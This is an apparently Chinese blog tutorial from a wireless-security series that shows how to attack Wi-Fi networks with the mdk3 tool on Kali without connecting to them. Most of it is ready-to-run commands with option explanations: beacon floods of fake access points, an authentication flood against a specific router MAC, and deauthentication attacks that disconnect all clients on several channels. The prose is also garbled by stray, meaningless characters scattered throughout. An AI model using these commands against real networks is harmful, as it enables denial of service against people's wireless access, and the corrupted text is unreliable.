中秋節(jié)玩的比較嗨炭序,無線安全專題的文章就拖沓了一下啤覆,見諒見諒。惭聂。窗声。上篇講解了無線安全專題_破解篇03--打造個人字典,有感興趣的朋友給我私信辜纲,還有在公眾號中給我留言說笨觅,希望我講解一下彩虹表和GPU破解的事情,所以我為了響應(yīng)大家的需求耕腾,我之后會在破解篇中再增加一篇專門講解彩虹表和GPU破解的問題见剩。今天咱們就開啟無線安全專題下一篇:攻擊篇。攻擊篇主要分為兩個部分:一個是不連接上無線下的攻擊扫俺,一個是連接上無線下的攻擊苍苞。本次講解的就是如何在不連接無線的情況下進(jìn)行攻擊(僅僅是討論技術(shù),切不要進(jìn)行惡意使用)狼纬,主要使用的工具是kali下面的mdk3羹呵。(我的新書《Python爬蟲開發(fā)與項目實(shí)戰(zhàn)》發(fā)布了,大家在這里可以看到樣章)
一.偽造大量的死亡AP信號疗琉,干擾通信
首先咱們將無線網(wǎng)卡切換到監(jiān)聽模式(怎么切換的冈欢,請看我之前寫的文章),偽造大量的AP信號使用的是mdk3的b參數(shù)没炒。
b - Beacon Flood Mode
Sends beacon frames to show fake APs at clients.
This can sometimes crash network scanners and even drivers!
OPTIONS:
-n <ssid> Use SSID <ssid> instead of randomly generated ones 給AP信號指定名稱,不使用就隨機(jī)生成
-f <filename> Read SSIDs from file 可以從文件中讀取AP名稱
-v <filename> Read MACs and SSIDs from file. See example file! 可以從文件中讀取ap mac和名稱
-d Show station as Ad-Hoc 自定義為Ad-Hoc模式
-w Set WEP bit (Generates encrypted networks) 自定義為wep加密
-g Show station as 54 Mbit 自定義為54M模式
-t Show station using WPA TKIP encryption 自定義為wpa TKIP 加密
-a Show station using WPA AES encryption 自定義為wpa AES 加密
-m Use valid accesspoint MAC from OUI database 讀取數(shù)據(jù)庫中的mac
-h Hop to channel where AP is spoofed涛癌。This makes the test more effective against some devices/drivers。But it reduces packet rate due to channel hopping.
-c <chan> Fake an AP on channel <chan>. If you want your card to hop onl, this channel, you have to set -h option, too! 自定義信道
-s <pps> Set speed in packets per second (Default: 50) 自定義發(fā)包速率
1.1 偽造一個名稱為為qiye1送火,信道為1,發(fā)包速率為200的AP信號
mdk3 wlan1 b -n qiye1 -c 1 -p 200
1.2 偽造一個名稱為為qiye1先匪,信道為1种吸,發(fā)包速率為200,加密方式為wpa AES的AP信號
mdk3 wlan1 b -n qiye1 -c 1 -p 200 -a
從手機(jī)上可以看到qiye1這個信號是加密的呀非。
1.3 根據(jù)文件中的名稱偽造AP信號坚俗,信道為2镜盯。
mdk3 wlan1 b -f FakeAPName.txt -c 2
執(zhí)行完成后,在電腦上可以看到下圖的效果,顯示了我自定義文件中的AP名稱:
1.4 隨機(jī)偽造大量ap信號猖败,信道為1
mdk3 wlan1 b -g -c 1
二.驗證洪水攻擊方式恩闻,干擾通信艺糜,甚至可以干掉無線路由。
mdk3自動模擬隨機(jī)產(chǎn)生的mac向目標(biāo)AP發(fā)起大量驗證請求幢尚,可以導(dǎo)致AP忙于處理過多的請求而停止對正常連接客戶端的響應(yīng)破停,這個可以用來強(qiáng)迫用戶重啟路由。
a - Authentication DoS mode
Sends authentication frames to all APs found in range.
Too much clients freeze or reset almost every AP.
OPTIONS:
-a <ap_mac> Only test the specified AP 攻擊目標(biāo)AP的mac尉剩,可以看之前的欺騙篇真慢,可以知道怎么回去ap mac
-m Use valid client MAC from OUI database 使用數(shù)據(jù)庫中mac
-c Do NOT check for test being successful 不檢測測試是否成功
-i <ap_mac> Perform intelligent test on AP (-a and -c will be ignored) 智能測試This test connects clients to the AP and reinjects sniffed data to keep them alive
-s <pps> Set speed in packets per second (Default: unlimited) 發(fā)包速率
攻擊名稱為qiye,mac地址為FC:D7:33:DE:F3:8A的無線AP理茎。
mdk3 wlan1 a -a FC:D7:33:DE:F3:8A -c -s 300
發(fā)起攻擊后黑界,一直處于連接狀態(tài),直到超時皂林。手機(jī)也是這種情況朗鸠,點(diǎn)擊連接后沒有什么反應(yīng)。
三.強(qiáng)制解除驗證洪水攻擊方式式撼。
在這種模式下童社,軟件會想周圍所有的AP發(fā)送強(qiáng)制解除驗證數(shù)據(jù)包,迫使所有連接上AP的客戶端掉線著隆,無響應(yīng)扰楼。
d - Deauthentication / Disassociation Amok Mode
Kicks everybody found from AP
OPTIONS:
-w <filename> Read file containing MACs not to care about (Whitelist mode) 指定白名單mac
-b <filename> Read file containing MACs to run test on (Blacklist Mode) 指定mac黑名單
-s <pps> Set speed in packets per second (Default: unlimited) 發(fā)包速率
-c [chan,chan,chan,...] Enable channel hopping. Without providing any channels, mdk3 will hop an all 14 b/g channels. Channel will be changed every 5 seconds.指定信道,可以用逗號分隔多個信道
3.1 攻擊名稱為qiye美浦,mac地址為FC:D7:33:DE:F3:8A的無線AP,使我客戶端掉線無法上網(wǎng)弦赖。
mdk3 wlan1 d -b blacklist.txt
電腦掉線之后重新連接,發(fā)現(xiàn)已經(jīng)連不上了浦辨。
3.2 直接按照信道進(jìn)行全范圍攻擊
直接將我掃描到的所有信道進(jìn)行攻擊蹬竖。
mdk3 wlan1 d -c 6,11,4,3,13,7
今天的分享就到這里,下一篇繼續(xù)分析流酬。如果大家覺得還可以呀币厕,記得推薦呦。